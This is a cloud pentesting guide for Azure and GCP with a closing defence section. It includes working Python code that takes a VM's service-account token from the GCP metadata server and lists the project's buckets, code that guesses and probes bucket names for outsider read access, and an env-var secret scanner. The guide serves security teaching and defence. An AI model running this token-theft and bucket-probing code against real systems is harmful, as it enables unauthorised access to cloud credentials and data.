Pentesting AWS is well documented, but Azure and GCP are gaining ground. The principles are the same: it's rarely a buffer overflow; it's almost always a misconfiguration or an over-permissioned role.
Azure AD (Entra ID)
In Azure, identity is everything.
Attack: Azure AD Connect with Password Hash Sync (PHS).
With PHS the cloud account authenticates against a hash derived from the on-prem password, so a Domain Admin who DCSyncs the on-prem hashes holds the credentials of every synced cloud user too (cloud-only accounts are not affected, and the hash still has to be cracked or the password known, because pass-the-hash does not work against Entra ID). The Azure AD Connect server is itself Tier 0: its on-prem connector account (MSOL_*) has replication rights, i.e. DCSync, and its Entra sync account (Sync_*) can set passwords of synced users through the sync API, so compromising that one server is usually enough to take both directories.
Tools: MicroBurst, Az PowerShell, AADInternals (extracts the sync account credentials from the AD Connect server).
1. GCP Metadata service
Like AWS, GCP exposes an instance metadata server at `http://metadata.google.internal/computeMetadata/v1/` (also reachable as `169.254.169.254`); Cloud Run and Cloud Functions containers get one too.
Every request must carry the header `Metadata-Flavor: Google`; without it the server answers 403, so the SSRF has to let you set a header (the legacy `v1beta1` endpoint that did not require it is disabled on current VMs).
If you find such an SSRF on a GCP VM, read `instance/service-accounts/default/token` to get the attached service account's OAuth2 access token and use it as a bearer token against the Cloud Storage JSON API. What it can reach is bounded by the VM's access scopes (`instance/service-accounts/default/scopes`) and the account's IAM roles; the default Compute Engine service account with default scopes commonly carries Editor on the project and, through the default scopes, read access to every bucket in it.
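The chain above, written out as an added example (not code from the original page): pull the token, scopes and project id from the metadata server, then list the buckets the token can see. The `fetch` parameter is a hypothetical injection point so the same functions run offline against the constructed responses in `fake_fetch`; on a real VM the default `http_get` is used.

```python
"""Metadata server -> service-account token -> Cloud Storage bucket listing.
Added example, not from the original page. `fetch` and `fake_fetch` are
assumptions introduced so the code runs offline; the responses in _FAKE are
constructed sample data, not captured traffic."""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

METADATA = "http://metadata.google.internal/computeMetadata/v1"
STORAGE = "https://storage.googleapis.com/storage/v1"
Fetch = Callable[[str, Dict[str, str]], Tuple[int, str]]


def http_get(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Real HTTP GET returning (status, body); 4xx/5xx are results, not exceptions."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def metadata_get(path: str, fetch: Fetch = http_get) -> str:
    """GET a metadata path. The Metadata-Flavor header is mandatory; without it you get 403."""
    status, body = fetch(f"{METADATA}/{path}", {"Metadata-Flavor": "Google"})
    if status != 200:
        raise RuntimeError(f"metadata {path}: HTTP {status}")
    return body


def get_sa_token(fetch: Fetch = http_get) -> Tuple[str, int]:
    """OAuth2 access token of the instance's default service account and its lifetime."""
    tok = json.loads(metadata_get("instance/service-accounts/default/token", fetch))
    return tok["access_token"], int(tok["expires_in"])


def get_sa_scopes(fetch: Fetch = http_get) -> List[str]:
    """Access scopes bound to the token; they cap what the IAM roles allow."""
    return metadata_get("instance/service-accounts/default/scopes", fetch).split()


def get_project_id(fetch: Fetch = http_get) -> str:
    return metadata_get("project/project-id", fetch)


def list_buckets(project: str, token: str, fetch: Fetch = http_get) -> List[str]:
    """storage.buckets.list with the stolen token as a bearer token."""
    status, body = fetch(f"{STORAGE}/b?project={project}", {"Authorization": f"Bearer {token}"})
    if status != 200:
        raise RuntimeError(f"buckets.list: HTTP {status}")
    return [b["name"] for b in json.loads(body).get("items", [])]


def loot(fetch: Fetch = http_get) -> Dict[str, object]:
    """End to end: project, scopes, token, then every bucket the token can list."""
    token, _ = get_sa_token(fetch)
    project = get_project_id(fetch)
    return {"project": project, "scopes": get_sa_scopes(fetch),
            "buckets": list_buckets(project, token, fetch)}


# Constructed responses standing in for a real VM (sample data, not captured).
_FAKE = {
    f"{METADATA}/instance/service-accounts/default/token":
        json.dumps({"access_token": "ya29.EXAMPLE", "expires_in": 3599, "token_type": "Bearer"}),
    f"{METADATA}/instance/service-accounts/default/scopes":
        "https://www.googleapis.com/auth/devstorage.read_only\n"
        "https://www.googleapis.com/auth/logging.write\n",
    f"{METADATA}/project/project-id": "example-project",
    f"{STORAGE}/b?project=example-project":
        json.dumps({"items": [{"name": "example-project-backups"}, {"name": "example-project-logs"}]}),
}


def fake_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Mimics the two checks that matter: metadata wants the header, storage wants the token."""
    if url.startswith(METADATA) and headers.get("Metadata-Flavor") != "Google":
        return 403, "Missing Metadata-Flavor:Google header."
    if url.startswith(STORAGE) and headers.get("Authorization") != "Bearer ya29.EXAMPLE":
        return 401, "Unauthenticated"
    return (200, _FAKE[url]) if url in _FAKE else (404, "Not Found")


if __name__ == "__main__":
    print(json.dumps(loot(), indent=2))  # on a GCP VM; use loot(fake_fetch) offline
```

A plain SSRF that only controls the URL stops at the first check: `fake_fetch` returns 403 for a header-less metadata request, exactly like the real server, which is why header injection (or a gopher-style SSRF) is what you need on GCP.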
2. Storage Hunting
Azure Blobs: enumerate storage accounts and containers with MicroBurst (`Invoke-EnumerateAzureBlobs`) and look for containers that allow anonymous access; in the listings look for `passwords.txt`, `.env`, backups and config files.
GCP Buckets: bucket names are global, so guess them from the company or product name and probe them. Two IAM principals make a bucket readable to outsiders: `allUsers` (anonymous) and `allAuthenticatedUsers`, which means ANYONE with a Google account (any gmail address, not just your company's tenant).
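Bucket hunting as an added example (not code from the original page): guess names from the company, probe the object listing anonymously to catch `allUsers`, then again with a token for a throwaway Google account outside the target org to catch `allAuthenticatedUsers`. The `fetch` parameter and `fake_fetch` responses are assumptions so it runs offline; the status semantics (404 = no such bucket, 200 = listable, anything else = exists but denied) are how the JSON API behaves in my experience, so confirm the "nonexistent" verdict against a bucket you own before trusting it.

```python
"""Probe candidate Cloud Storage bucket names for outsider read access.
Added example, not from the original page. `fetch`/`fake_fetch` are hypothetical
and the response tables below are constructed, not captured."""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

STORAGE = "https://storage.googleapis.com/storage/v1"
Fetch = Callable[[str, Dict[str, str]], Tuple[int, str]]


def http_get(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """GET returning (status, body); 4xx/5xx are results here, not exceptions."""
    try:
        with urllib.request.urlopen(urllib.request.Request(url, headers=headers), timeout=5) as r:
            return r.status, r.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def classify_bucket(name: str, token: Optional[str] = None, fetch: Fetch = http_get) -> str:
    """'nonexistent' | 'public' | 'any-google-account' | 'private'.

    storage.objects.list is the permission that matters for looting, so probe the
    object listing rather than bucket metadata. 'any-google-account' can only be
    detected when a token is supplied; without one a denied bucket reads 'private'."""
    url = f"{STORAGE}/b/{name}/o?maxResults=1"
    status, _ = fetch(url, {})
    if status == 404:
        return "nonexistent"
    if status == 200:
        return "public"
    if token:
        status, _ = fetch(url, {"Authorization": f"Bearer {token}"})
        if status == 200:
            return "any-google-account"
    return "private"


def candidate_names(company: str) -> List[str]:
    """Bucket names are global, so company-derived guesses are the usual wordlist."""
    base = company.lower().replace(" ", "-")
    suffixes = ["", "-backup", "-backups", "-logs", "-prod", "-dev",
                "-staging", "-data", "-assets", "-terraform"]
    return [f"{base}{s}" for s in suffixes]


def hunt(company: str, token: Optional[str] = None, fetch: Fetch = http_get) -> Dict[str, str]:
    """Classify every candidate and report only the buckets that exist."""
    results = {n: classify_bucket(n, token, fetch) for n in candidate_names(company)}
    return {n: v for n, v in results.items() if v != "nonexistent"}


# Constructed response tables standing in for the real API (not captured traffic):
# status for an anonymous caller, and for a caller presenting FAKE_TOKEN.
FAKE_TOKEN = "ya29.throwaway-google-account"
_ANON = {"acme": 401, "acme-backups": 401, "acme-assets": 200, "acme-logs": 401}
_AUTHED = {"acme": 403, "acme-backups": 200, "acme-assets": 200, "acme-logs": 403}


def fake_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    bucket = url[len(STORAGE) + 3:].split("/")[0]  # ".../b/<bucket>/o?..."
    table = _AUTHED if headers.get("Authorization") == f"Bearer {FAKE_TOKEN}" else _ANON
    return table.get(bucket, 404), ""


if __name__ == "__main__":
    for bucket_name, verdict in hunt("acme").items():  # add token=... for the second pass
        print(f"{bucket_name}: {verdict}")
```

`acme-backups` in the constructed data is the case the text warns about: closed to anonymous callers, open to any Google account, and invisible to a scanner that only does the anonymous pass.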
3. Cloud Functions / Run
Serverless functions often carry hardcoded secrets in environment variables.
Plain environment variables sit in cleartext in the function's (or Cloud Run service's) configuration, so anyone who can read that configuration (`cloudfunctions.functions.get`, `run.services.get`, or just the console) gets the database credentials without touching the code or the runtime. Variables backed by Secret Manager show up only as references in the same output, which is the fix.
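A scanner for that configuration, as an added example (not code from the original page): it walks the JSON that `gcloud functions describe NAME --format=json` or `gcloud run services describe NAME --format=json` prints, collects every plaintext environment variable whatever the API shape, and flags the ones whose name or value looks like a credential. The two sample descriptions are constructed and the name/value rules are heuristics of my own.

```python
"""Flag secrets left in plaintext env vars of a Cloud Function / Cloud Run service.
Added example, not from the original page; SAMPLE_* are constructed descriptions
and the regexes are heuristics, not an official list."""
import math
import re
from typing import Any, Dict, List, Tuple

# Names that usually hold credentials (case-insensitive; KEY is noisy on purpose).
SUSPICIOUS_NAME = re.compile(r"PASS(WORD)?|SECRET|TOKEN|KEY|CRED|DSN", re.I)
# Value shapes that are secrets regardless of the variable name.
SUSPICIOUS_VALUE = [
    ("google api key", re.compile(r"^AIza[0-9A-Za-z_-]{35}$")),
    ("private key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("url with embedded password", re.compile(r"^[a-z][a-z0-9+.-]*://[^:/@\s]+:[^@\s]+@")),
    ("jwt", re.compile(r"^eyJ[\w-]+\.[\w-]+\.[\w-]+$")),
]


def shannon_entropy(s: str) -> float:
    """Bits per character; random tokens sit well above natural words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def value_looks_secret(value: str) -> str:
    """Return a reason string, or '' if the value looks benign."""
    for label, rx in SUSPICIOUS_VALUE:
        if rx.search(value):
            return label
    if len(value) >= 20 and " " not in value and shannon_entropy(value) > 4.0:
        return "high-entropy value"
    return ""


def plain_env(config: Any) -> List[Tuple[str, str, str]]:
    """(json_path, name, value) for every *plaintext* env var, whatever the shape:
    gen1 `environmentVariables`, gen2 `serviceConfig.environmentVariables`, Cloud Run
    `containers[].env[]`. Secret Manager entries (`secretEnvironmentVariables`,
    Cloud Run `valueFrom.secretKeyRef`) carry no value in the description and are skipped."""
    found: List[Tuple[str, str, str]] = []

    def walk(node: Any, path: str) -> None:
        if isinstance(node, dict):
            for key, val in node.items():
                here = f"{path}.{key}"
                if key == "environmentVariables" and isinstance(val, dict):
                    found.extend((here, k, str(v)) for k, v in val.items())
                elif key == "env" and isinstance(val, list):
                    for item in val:
                        if isinstance(item, dict) and "value" in item:
                            found.append((here, str(item.get("name")), str(item["value"])))
                else:
                    walk(val, here)
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")

    walk(config, "$")
    return found


def find_secrets(config: Any) -> List[Dict[str, str]]:
    """Every plaintext env var whose name or value looks like a credential."""
    findings = []
    for path, name, value in plain_env(config):
        reasons = ["suspicious name"] if SUSPICIOUS_NAME.search(name) else []
        why = value_looks_secret(value)
        if why:
            reasons.append(why)
        if reasons:
            findings.append({"path": path, "name": name, "why": ", ".join(reasons)})
    return findings


# Constructed samples in the shape of `gcloud ... describe --format=json` (not real resources).
SAMPLE_FUNCTION_GEN2 = {
    "name": "projects/example-project/locations/us-central1/functions/orders",
    "serviceConfig": {
        "environmentVariables": {
            "LOG_LEVEL": "info",
            "DB_PASSWORD": "hunter2-prod-2024",
            "DATABASE_URL": "postgres://app:hunter2-prod-2024@10.0.0.5:5432/orders",
        },
        "secretEnvironmentVariables": [
            {"key": "API_TOKEN", "secret": "orders-api-token", "version": "latest"}
        ],
    },
}
SAMPLE_RUN_SERVICE = {
    "spec": {"template": {"spec": {"containers": [{
        "image": "gcr.io/example-project/orders",
        "env": [
            {"name": "PORT", "value": "8080"},
            {"name": "STRIPE_KEY", "value": "sk_live_EXAMPLEONLY0123456789abcd"},
            {"name": "DB_PASS", "valueFrom": {"secretKeyRef": {"name": "db-pass", "key": "latest"}}},
        ],
    }]}}},
}

if __name__ == "__main__":
    import json, sys
    for f in find_secrets(json.load(sys.stdin)):  # pipe the describe output in
        print(f"{f['path']} {f['name']}: {f['why']}")
```

Note that `API_TOKEN` and `DB_PASS` in the samples are not reported: they come from Secret Manager, so the description only names the secret, which is the state you want every credential-bearing variable to be in.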
Defense
1. Least privilege: in Entra ID use PIM (Privileged Identity Management) so privileged roles are activated just-in-time, with approval and expiry, instead of being held standing; in GCP avoid Owner/Editor grants and do not run workloads as the default Compute service account.
2. Service boundaries: put Storage, BigQuery and the other data services inside a VPC Service Controls perimeter in GCP, so a stolen credential used from outside the perimeter cannot exfiltrate the data even though it is valid.